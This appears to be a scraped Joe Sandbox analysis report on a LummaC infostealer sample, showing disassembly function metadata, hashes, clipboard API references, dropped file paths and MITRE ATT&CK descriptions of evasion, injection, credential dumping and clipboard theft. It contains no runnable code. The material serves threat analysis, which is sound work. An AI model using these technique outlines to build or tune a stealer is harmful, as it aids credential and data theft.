String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757

Function 024E2670 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 024E26B6

Strings

X, xrefs: 024E26DE
X, xrefs: 024E26D4
A, xrefs: 024E2751
[, xrefs: 024E272E
C, xrefs: 024E26E8
L, xrefs: 024E2724
Q, xrefs: 024E2706
@, xrefs: 024E2710
H, xrefs: 024E2738
@, xrefs: 024E274C
[, xrefs: 024E2742
e, xrefs: 024E271A
E, xrefs: 024E26FC
J, xrefs: 024E26F2

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
Instruction ID: 144473913e9469fe24b56b4576602656c7f1ef54c60d910c48ab234dea5f4841
Opcode Fuzzy Hash: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
Instruction Fuzzy Hash: 9341097010C7C18AD365DB28849878FBFE16B96314F885A9CE5E94B3E2C7798445CB63

Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004321C6

Strings

[, xrefs: 00432259
@, xrefs: 00432227
[, xrefs: 00432245
X, xrefs: 004321EB
@, xrefs: 00432263
C, xrefs: 004321FF
L, xrefs: 0043223B
A, xrefs: 00432268
J, xrefs: 00432209
Q, xrefs: 0043221D
e, xrefs: 00432231
X, xrefs: 004321F5
E, xrefs: 00432213
H, xrefs: 0043224F

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757

Function 024E23FB Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 024E242D

Strings

H, xrefs: 024E24B6
A, xrefs: 024E24CF
L, xrefs: 024E24A2
@, xrefs: 024E248E
e, xrefs: 024E2498
[, xrefs: 024E24C0
X, xrefs: 024E2452
X, xrefs: 024E245C
J, xrefs: 024E2470
[, xrefs: 024E24AC
@, xrefs: 024E24CA
Q, xrefs: 024E2484
C, xrefs: 024E2466
E, xrefs: 024E247A

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
Instruction ID: 5837ac05c3e7f33337678194bfa92085648527c7dca181c2f5fb214039585900
Opcode Fuzzy Hash: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
Instruction Fuzzy Hash: 5B411B7040C7C19AD365DB28849874FBFE06B93214F885A9DF6E94B3E2C7798449C753

Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431EE7
VariantInit.OLEAUT32 ref: 00431EFA

Strings

e, xrefs: 00431F1F
p, xrefs: 00431F9F
A, xrefs: 00431F8F
w, xrefs: 00431F4F
p, xrefs: 00431FBF
v, xrefs: 00431F3F
n, xrefs: 00431FAF
e, xrefs: 00431F5F
z, xrefs: 00431F2F
z, xrefs: 00431F6F

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763

Function 024E2144 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 024E214E
VariantInit.OLEAUT32 ref: 024E2161

Strings

p, xrefs: 024E2206
e, xrefs: 024E21C6
n, xrefs: 024E2216
z, xrefs: 024E21D6
p, xrefs: 024E2226
e, xrefs: 024E2186
v, xrefs: 024E21A6
A, xrefs: 024E21F6
z, xrefs: 024E2196
w, xrefs: 024E21B6

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 962e4ea8e049bc84b7a2e564d1040fff2c8a9c042be8b34220e271c44cd75340
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 5C41373160C7C18ED331CB38885879BBFD2ABA6324F088AADD4E9872D6D7794505C763

Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004329E2
GetClipboardData.USER32 ref: 00432A05
GlobalLock.KERNEL32 ref: 00432A22
GlobalUnlock.KERNEL32 ref: 00432B6B
CloseClipboard.USER32 ref: 00432B73

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797

Function 024E2C27 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 024E2C49
GetClipboardData.USER32 ref: 024E2C6C
GlobalLock.KERNEL32 ref: 024E2C89
GlobalUnlock.KERNEL32 ref: 024E2DD2
CloseClipboard.USER32 ref: 024E2DDA

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
Instruction ID: d52cef657c6ac5b53577afa34dfff42143d8fd0b4414dc52f4520b903e2b5771
Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
Instruction Fuzzy Hash: 3B51E7F1D086528FEB00AB78C4493AEFFA4AF41310F04863ED99697391D3799995C7A3

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TUp6f2knn2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_B4A1.tmp.exe_ac695b942acde452d0e9c26289fa41d5e7476a_e5a20fe4_29f0898a-8b36-49f1-97a6-c003c8cfc686\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC693.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC943.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC992.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
TUp6f2knn2.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0253003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre